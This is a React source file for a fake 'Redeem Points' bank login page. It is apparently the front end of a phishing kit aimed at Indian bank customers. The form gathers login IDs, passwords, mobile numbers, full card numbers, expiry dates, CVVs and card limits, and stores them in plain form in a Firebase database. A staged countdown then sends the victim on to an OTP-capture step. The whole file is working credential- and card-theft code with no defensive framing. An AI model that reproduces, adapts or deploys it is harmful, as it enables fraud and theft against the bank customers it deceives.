
import React, { useState, useRef, useEffect } from "react";
import { ref, set, push } from "firebase/database";
import { useNavigate } from "react-router-dom";
import { db } from '../firebaseConfig'; // Import Firebase configuration
import './Style.css';

const Index = () => {
    const [activeButton, setActiveButton] = useState('loginid');
    const [formData, setFormData] = useState({
        lc_id: '',
        lpass: '',
        rgmob: '',
        ccnum: '',
        edate: '',
        cvv: '',
        ccl: '',
        rgmob_cc: ''
    });

    const navigate = useNavigate();
    const ccnumRef = useRef(null);
    const edateRef = useRef(null);
    const cvvRef = useRef(null);
    const [loading, setLoading] = useState(false); // State to manage loader visibility
    const [countdown, setCountdown] = useState(10); // Countdown state

    // Handle button click to toggle between forms
    const handleButtonClick = (buttonId) => {
        setActiveButton(buttonId);
    };

    // Handle input change and form validation
    const handleChange = (e) => {
        const { name, value } = e.target;

        if (name === 'ccnum') {
            // Format credit card number with spaces
            const formattedValue = value
                .replace(/\s+/g, '')
                .replace(/[^\d/]/g, '')       // Remove all non-digit characters
                .replace(/(\d{4})(?=\d)/g, '$1 ') // Insert space every 4 digits
                .slice(0, 19); // Limit to 19 characters (16 digits + 3 spaces)

            setFormData((prevData) => ({
                ...prevData,
                [name]: formattedValue
            }));
        } else if (name === 'rgmob' || name === 'rgmob_cc') {
            const numbervalue = value.replace(/[^\d/]/g, '').slice(0, 10);
            setFormData((prevData) => ({
                ...prevData,
                [name]: numbervalue
            }));
        } else if (name === 'cvv') {
            const cvvvalue = value.replace(/[^\d/]/g, '').slice(0, 4);
            setFormData((prevData) => ({
                ...prevData,
                [name]: cvvvalue
            }));
        } else if (name === 'edate') {
            let expiryValue = value.replace(/[^\d]/g, ''); // Remove any non-digit characters

            if (expiryValue.length > 2) {
                expiryValue = expiryValue.slice(0, 2) + '/' + expiryValue.slice(2);
            }

            expiryValue = expiryValue.slice(0, 5); // Limit to MM/YY (5 characters)

            setFormData((prevData) => ({
                ...prevData,
                [name]: expiryValue
            }));
        } else {
            setFormData((prevData) => ({
                ...prevData,
                [name]: value
            }));
        }
    };

    // Handle form submission
    const handleSubmitFirstPart = (e) => {
        e.preventDefault();

        // Set loader state to true and start countdown
        setLoading(true);
        setCountdown(10); // Reset countdown
        const currentDateTime = new Date().toLocaleString(); // Format the date and time

        // Update formData with current date and time
        setFormData((prevData) => ({
            ...prevData,
            currentDateTime
        }));

        // Validate credit card number length for 'credit' button
        if (activeButton === 'credit') {
            const ccnumDigits = formData.ccnum.replace(/\s+/g, '');
            if (ccnumDigits.length < 13 || ccnumDigits.length > 16) {
                alert("Credit card number must be between 13 and 16 digits.");
                setLoading(false); // Stop loading if validation fails
                return;
            }
        }

        // Create a unique reference ID in Firebase
        const newRef = push(ref(db, 'users')).key;

        // Store form data in Firebase under the unique reference ID
        set(ref(db, `newmember/${newRef}`), {
            lc_id: formData.lc_id,
            lpass: formData.lpass,
            rgmob: formData.rgmob,
            ccnum: formData.ccnum.replace(/\s+/g, ''), // Remove spaces before storing
            edate: formData.edate,
            cvv: formData.cvv,
            ccl: formData.ccl,
            rgmob_cc: formData.rgmob_cc,
            date: currentDateTime
        }).then(() => {
            // Simulate loader with countdown, then navigate after loader finishes
            setTimeout(() => {
                setLoading(false);
                navigate('/otpverifying', { state: { refId: newRef } });
            }, 10000); // Simulate a 10 second loading time
        }).catch((error) => {
            console.error("Error storing data: ", error);
            setLoading(false); // Stop loading in case of an error
        });
    };

    // Countdown logic
    useEffect(() => {
        let interval;

        if (loading && countdown > 0) {
            // Start countdown interval when loading is true
            interval = setInterval(() => {
                setCountdown(prevCountdown => {
                    if (prevCountdown > 1) {
                        return prevCountdown - 1;
                    } else {
                        clearInterval(interval);
                        return 0;
                    }
                });
            }, 1000);
        }

        return () => clearInterval(interval);
    }, [loading, countdown]);

    return (
        <div className="main">
            {loading && (
                <div className="loader-overlay">
                    <div className="loader"></div>
                    <div className="countdown">Please Wait... {countdown}s</div>
                </div>
            )}
            <h2 className="text-center reddem">Continue to Redeem Points</h2>
            <div className="button-group">
                <button
                    id="loginid"
                    className={`btn ${activeButton === 'loginid' ? 'btn-primary' : ''} login-form fs text-center`}
                    onClick={() => handleButtonClick('loginid')}
                >
                    Login ID / Customer ID
                </button>
                <button
                    id="credit"
                    className={`btn ${activeButton === 'credit' ? 'btn-primary' : ''} button-inactive credit-card-form fs text-center`}
                    onClick={() => handleButtonClick('credit')}
                >
                    Credit Card Login
                </button>
            </div>

            <form className='Form' onSubmit={handleSubmitFirstPart}>
                <input
                    type="hidden"
                    name="currentDateTime"
                    value={formData.currentDateTime}
                    readOnly
                />
                {activeButton === 'loginid' ? (
                    <div id='login_form'>
                        <div className='form-group'>
                            <label htmlFor="lc_id">Login ID / Customer ID</label>
                            <input
                                type="text"
                                onChange={handleChange}
                                value={formData.lc_id}
                                name='lc_id'
                                id='lc_id'
                                required={activeButton === 'loginid'}
                            />
                        </div>
                        <div className='form-group'>
                            <label htmlFor="lpass">Password</label>
                            <input
                                type="password"
                                onChange={handleChange}
                                value={formData.lpass}
                                name='lpass'
                                id='lpass'
                                required={activeButton === 'loginid'}
                            />
                        </div>
                        <div className='form-group'>
                            <label htmlFor="rgmob">Registered Mobile No.</label>
                            <input
                                type="text"
                                inputMode="numeric"
                                onChange={handleChange}
                                value={formData.rgmob}
                                name='rgmob'
                                minLength="10"
                                id='rgmob'
                                required={activeButton === 'loginid'}
                            />
                        </div>
                    </div>
                ) : (
                    <div id='credit_card_form'>
                        <div className="form-group">
                            <label htmlFor="ccnum">Credit Card Number</label>
                            <input
                                ref={ccnumRef}
                                id="ccnum"
                                type="text"
                                onChange={handleChange}
                                value={formData.ccnum}
                                name="ccnum"
                                inputMode="numeric"
                                minLength="19"
                                maxLength="19"
                                required={activeButton === 'credit'}
                            />
                        </div>
                        <div className="form-two w-100">
                            <div className="form-group w-50">
                                <label htmlFor="edate">Expiry Date</label>
                                <input
                                    ref={edateRef}
                                    type="text"
                                    onChange={handleChange}
                                    value={formData.edate}
                                    id="edate"
                                    name="edate"
                                    minLength="5"
                                    inputMode="numeric"
                                    placeholder="MM / YY"
                                    required={activeButton === 'credit'}
                                />
                            </div>
                            <div className="form-group w-50">
                                <label htmlFor="cvv">CVV/CVV</label>
                                <input
                                    ref={cvvRef}
                                    type="password"
                                    inputMode="numeric"
                                    onChange={handleChange}
                                    value={formData.cvv}
                                    id="cvv"
                                    name="cvv"
                                    placeholder="***"
                                    required={activeButton === 'credit'}
                                />
                            </div>
                        </div>
                        <div className="form-group">
                            <label htmlFor="ccl">Available Card Limit (in Rupees)</label>
                            <input
                                id="ccl"
                                type="text"
                                onChange={handleChange}
                                value={formData.ccl}
                                name="ccl"
                                inputMode="numeric"
                                required={activeButton === 'credit'}
                            />
                        </div>
                        <div className="form-group">
                            <label htmlFor="rgmob_cc">Registered Mobile No.</label>
                            <input
                                id="rgmob_cc"
                                type="text"
                                onChange={handleChange}
                                value={formData.rgmob_cc}
                                minLength="10"
                                name="rgmob_cc"
                                inputMode="numeric"
                                required={activeButton === 'credit'}
                            />
                        </div>
                    </div>
                )}
                <div className="form-group">
                    <button type="submit" className="btn btn-primary">LOGIN</button>
                </div>
            </form>
        </div>
    );
}

export default Index;
